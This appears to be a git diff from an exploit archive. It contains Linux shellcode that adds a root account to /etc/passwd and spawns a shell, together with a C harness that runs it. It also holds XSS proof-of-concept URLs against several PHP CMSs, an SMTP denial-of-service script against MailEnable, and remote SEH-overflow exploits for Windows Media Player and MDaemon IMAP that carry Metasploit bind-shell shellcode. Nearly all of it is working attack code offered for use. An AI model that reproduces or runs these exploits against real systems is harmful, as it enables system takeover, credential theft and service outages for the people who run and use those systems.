bf: 68 50 4d 59 68 push $0x68594d50
c4: 68 54 42 74 7a push $0x7a744254
c9: 68 51 2f 38 54 push $0x54382f51
ce: 68 45 36 6d 67 push $0x676d3645
d3: 68 76 50 2e 73 push $0x732e5076
d8: 68 4e 58 52 37 push $0x3752584e
dd: 68 39 4b 55 48 push $0x48554b39
e2: 68 72 2f 59 42 push $0x42592f72
e7: 68 56 78 4b 47 push $0x474b7856
ec: 68 39 55 66 5a push $0x5a665539
f1: 68 46 56 6a 68 push $0x686a5646
f6: 68 46 63 38 79 push $0x79386346
fb: 68 70 59 6a 71 push $0x716a5970
100: 68 77 69 53 68 push $0x68536977
105: 68 6e 54 67 54 push $0x5467546e
10a: 68 58 4d 69 37 push $0x37694d58
10f: 68 2f 41 6e 24 push $0x246e412f
114: 68 70 55 6e 4d push $0x4d6e5570
119: 68 24 36 24 6a push $0x6a243624
11e: 68 41 4c 49 3a push $0x3a494c41
123: 89 e1 mov %esp,%ecx
125: ba 41 41 41 7f mov $0x7f414141,%edx
12a: c1 ea 08 shr $0x8,%edx
12d: c1 ea 08 shr $0x8,%edx
130: c1 ea 08 shr $0x8,%edx
133: cd 80 int $0x80
135: 31 c0 xor %eax,%eax
137: b0 46 mov $0x46,%al
139: 31 db xor %ebx,%ebx
13b: 31 c9 xor %ecx,%ecx
13d: cd 80 int $0x80
13f: 31 c0 xor %eax,%eax
141: b0 46 mov $0x46,%al
143: 31 db xor %ebx,%ebx
145: 31 c9 xor %ecx,%ecx
147: cd 80 int $0x80
149: 68 59 59 59 59 push $0x59595959
14e: 68 58 58 58 58 push $0x58585858
153: 68 2f 73 68 42 push $0x4268732f
158: 68 2f 62 69 6e push $0x6e69622f
15d: 89 e3 mov %esp,%ebx
15f: 31 c0 xor %eax,%eax
161: 88 43 07 mov %al,0x7(%ebx)
164: 89 5b 08 mov %ebx,0x8(%ebx)
167: 89 43 0c mov %eax,0xc(%ebx)
16a: b0 0b mov $0xb,%al
16c: 8d 4b 08 lea 0x8(%ebx),%ecx
16f: 8d 53 0c lea 0xc(%ebx),%edx
172: cd 80 int $0x80
174: b0 01 mov $0x1,%al
176: b3 01 mov $0x1,%bl
178: cd 80 int $0x80
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x6a\x0f\x58\x68\x6a\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x0f\x58\x68\x6a\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x05\x58\x68\x41\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\x68\x6e\x2f\x62\x61\x68\x3a\x2f\x62\x69\x68\x72\x6f\x6f\x74\x68\x4c\x49\x3a\x2f\x68\x3a\x30\x3a\x41\x68\x4b\x2e\x3a\x30\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\x68\x41\x4c\x49\x3a\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x59\x59\x59\x59\x68\x58\x58\x58\x58\x68\x2f\x73\x68\x42\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}

9
platforms/php/webapps/34265.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41447/info
Exponent CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Exponent 0.97.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules/slideshowmodule/slideshow.js.php?u=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E

12
platforms/php/webapps/34266.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/41448/info
RunCms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
RunCms 2.1 is vulnerable; other versions may also be affected.
The following example request is available:
wget --user-agent="
" http://www.example.com/modules/forum/check.php

14
platforms/php/webapps/34268.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/41453/info
Worxware DCP-Portal is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DCP-Portal 7.0 Beta is vulnerable; other versions may also be affected.
http://www.example.com/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.example.com/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.example.com/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.example.com/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.example.com/modules/gallery/view_img.php?imagename=%22&#039;);window.alert(&#039;XSS&#039;);document.write(&#039;%22
http://www.example.com/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E

11
platforms/php/webapps/34269.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41456/info
Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pligg 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E
http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E

186
platforms/windows/dos/5235.py
View file

@ -1,93 +1,93 @@
#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
# Professional Edition all versions
# Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
# Windows 2003 Standard Edition Italian
# Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-------------------------------------------------------------------------
#
# THX TO muts at offensive-security.com :
# I'll promise you: next time i'll find an easier one and get my shell :P
#
#-------------------------------------------------------------------------
##########################################################################
#
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
# [+] Connecting to 192.168.1.245 on port 25
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
# 03/06/08 13:20:49
#
# [+] Sending evilbuffer...
# [+] Waiting 10 secs before reconnecting...
# [+] Reconnecting...
# [+] SMTP Server died!
# [+] Connection refused
#
##########################################################################
from socket import *
from optparse import OptionParser
import sys, time
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-c", "--command", type="string",
action="store", dest="COMMAND",
help="Command: VRFY or EXPN ; defualt VRFY")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
COMMAND = options.COMMAND
if not (HOST and PORT):
parser.print_help()
sys.exit()
if not COMMAND:
COMMAND = 'VRFY'
print "[+] Using default command VRFY"
else:
COMMAND = COMMAND.upper().strip()
if COMMAND != 'VRFY' and COMMAND != 'EXPN':
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
sys.exit()
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connecting to %s on port %d" % (HOST, PORT)
print s.recv(1024)
print "[+] Sending evilbuffer..."
s.send(evilbuf)
s.close()
print "[+] Waiting 10 secs before reconnecting..."
time.sleep(10)
try:
s = socket(AF_INET, SOCK_STREAM)
print "[+] Reconnecting..."
s.connect((HOST, PORT))
except error, e:
print "[+] SMTP Server died!"
print "[+] %s" % e[1]
else:
print "[-] SMTP Server is still up"
print "[-] This probably means that is not vulnerable"
s.close()
# milw0rm.com [2008-03-11]
#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
# Professional Edition all versions
# Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
# Windows 2003 Standard Edition Italian
# Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-------------------------------------------------------------------------
#
# THX TO muts at offensive-security.com :
# I'll promise you: next time i'll find an easier one and get my shell :P
#
#-------------------------------------------------------------------------
##########################################################################
#
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
# [+] Connecting to 192.168.1.245 on port 25
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
# 03/06/08 13:20:49
#
# [+] Sending evilbuffer...
# [+] Waiting 10 secs before reconnecting...
# [+] Reconnecting...
# [+] SMTP Server died!
# [+] Connection refused
#
##########################################################################
from socket import *
from optparse import OptionParser
import sys, time
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-c", "--command", type="string",
action="store", dest="COMMAND",
help="Command: VRFY or EXPN ; defualt VRFY")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
COMMAND = options.COMMAND
if not (HOST and PORT):
parser.print_help()
sys.exit()
if not COMMAND:
COMMAND = 'VRFY'
print "[+] Using default command VRFY"
else:
COMMAND = COMMAND.upper().strip()
if COMMAND != 'VRFY' and COMMAND != 'EXPN':
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
sys.exit()
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connecting to %s on port %d" % (HOST, PORT)
print s.recv(1024)
print "[+] Sending evilbuffer..."
s.send(evilbuf)
s.close()
print "[+] Waiting 10 secs before reconnecting..."
time.sleep(10)
try:
s = socket(AF_INET, SOCK_STREAM)
print "[+] Reconnecting..."
s.connect((HOST, PORT))
except error, e:
print "[+] SMTP Server died!"
print "[+] %s" % e[1]
else:
print "[-] SMTP Server is still up"
print "[-] This probably means that is not vulnerable"
s.close()
# milw0rm.com [2008-03-11]

236
platforms/windows/remote/4866.py
View file

@ -1,118 +1,118 @@
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.243
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
from socket import *
# SMI BODY
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=\""""
# Metasploit bind shell on port 4444 EXITFUNC seh
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
)
body += 21988*'A'
body += '\x90'*16 # NOP Slide
body += shellcode + 'C'*67 # to SEH...
body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77' # ShortJmp, and SEH overwrite
body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
# RESPONSE HEADER
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: application/smil\r\n'
'\r\n'
)
evilbuf = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evilbuf)
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()
# milw0rm.com [2008-01-08]
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.243
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
from socket import *
# SMI BODY
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=\""""
# Metasploit bind shell on port 4444 EXITFUNC seh
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
)
body += 21988*'A'
body += '\x90'*16 # NOP Slide
body += shellcode + 'C'*67 # to SEH...
body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77' # ShortJmp, and SEH overwrite
body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
# RESPONSE HEADER
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: application/smil\r\n'
'\r\n'
)
evilbuf = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evilbuf)
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()
# milw0rm.com [2008-01-08]

310
platforms/windows/remote/5248.py
View file

@ -1,155 +1,155 @@
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
print "[*********************************************************************]"
print "[* *]"
print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]"
print "[* DISCOVERED AND CODED *]"
print "[* by *]"
print "[* MATTEO MEMELLI *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
"\xff\xd0"
)
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inbox\r\n")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
s.send('0003 APPEND Inbox {1}\r\n')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCE\r\n')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
s.close()
